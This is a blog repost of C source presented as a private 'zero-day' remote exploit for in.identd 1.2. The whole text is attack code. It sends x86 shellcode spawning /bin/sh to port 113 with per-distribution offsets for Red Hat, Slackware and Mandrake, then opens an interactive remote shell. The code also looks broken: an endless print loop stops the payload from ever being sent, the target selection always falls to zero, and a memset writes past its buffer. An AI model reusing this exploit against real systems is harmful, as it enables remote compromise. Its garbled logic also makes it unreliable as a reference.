identd 1.2 remote exploit

转载

houwenhui 2011-05-18 18:25:20 博主文章分类：linux

/*
* identd-0day.c - in.identd 1.2 remote exploit
*
* by japboy <hacker.bob@sc.am>
*
* Compile: gcc -o identd-0day identd-0day.c
*
* PRIVATE PRIVATE PRIVATE PRIVATE
* 0DAY 0DAY 0DAY 0DAY 0DAY
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>

#define COMMAND "uname -a;id;uptime;"

char *shellcode="\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x16\x31\xdb\x31"
"\xc9\xf7\xe1\x5b\xb0\x0b\x88\x53\x07\x52\x53\x89\xe1\xcd\x80"
"\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff/bin/sh";

struct os {char *name;int offset;int chunk;} oss[] = {
{
"Red Hat 8.0 (Psyche)",
0x8622067,
0x420158d4
},
{
"Slackware 8.1",
0x86f3d61,
0x420158d4
},
{
"Mandrake Linux 8.2",
0x8622079,
0x420158d4
}
};

void usage(char *a) {
int i;
printf("%s [host] [os]\n",a);
for (i=0;i<3;i++) {
printf("\t%d - %s\n",i,oss[i].name);
}
}

void sendshellcode(int sock,int ost) {
unsigned char sent[]=COMMAND;
unsigned char buffer[512];

int i,j,p,size=sizeof(buffer);
unsigned int ret;

memset(buffer,0x90,size+10); /* Fill empty space */

memcpy((buffer+size)-strlen(shellcode),shellcode,strlen(shellcode)); /* Copy shellcode last*/

/* Fill with offset */
for (i=0,p=0;i<10;i++) buffer[size+p++]-=0x88;
for (j=2;j>=0;j--) for (i=0;i<3;i++) buffer[size+p++]=((char*)&oss[ost+i].offset)[j];

/* Write to socket */
for(;;)
printf("[x] Sent: %s\n",sent);
if ((ret=write(sock,buffer,size)) < 0) {
printf("[x] Unable to send shellcode\n");
exit(0);
}
}

void sh(int sock) {
char rcv[1024];
fd_set rset;
int maxfd, n;

/* Main command loop */
while(1) {
FD_SET(fileno(stdin), &rset);
FD_SET(sock, &rset);

maxfd = ( ( fileno(stdin) > sock )?fileno(stdin):sock ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);

if (FD_ISSET(fileno(stdin), &rset)) {
bzero(rcv, sizeof(rcv));
fgets(rcv, sizeof(rcv)-2, stdin);
write(sock, rcv, strlen(rcv));
}

if (FD_ISSET(sock, &rset)) {
bzero(rcv, sizeof(rcv));

if ((n = read(sock, rcv, sizeof(rcv))) == 0) {
printf("Good Bye!\n");
return;
}

if (n < 0) {
perror("read");
return;
}

fputs(rcv, stdout);
fflush(stdout); /* keeps output nice */
}
} /* for(;;) */
}

int main(int argc, char **argv) {
int sock;
unsigned int ost,ret;
struct sockaddr_in in;
struct hostent *hp;
if (argc <= 1) {
usage(argv[0]);
exit(1);
}
ost=atol(argv[2]);
if (ost > 2) ost=2;
if (ost > 0) ost=0;
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
printf("[x] Error creating socket\n");
exit(0);
}
if (inet_addr(argv[1]) == 0 || inet_addr(argv[1]) == -1) {
if ((hp = gethostbyname(argv[1])) == NULL) {
printf("[x] Error resolving host\n");
exit(0);
}
bcopy((char*)hp->h_addr, (char*)&in.sin_addr, hp->h_length);
}
else in.sin_addr.s_addr=inet_addr(argv[1]);
in.sin_family = AF_INET;
in.sin_port = htons(113);
printf("[x] Trying to connect\n");
if ((ret=connect(sock, (struct sockaddr *)&in, sizeof(in))) < 0) {
printf("[x] Error connecting to host\n");
exit(0);
}
printf("[x] Connected....\n");
sendshellcode(sock,ost);
sh(sock);
return 0;
}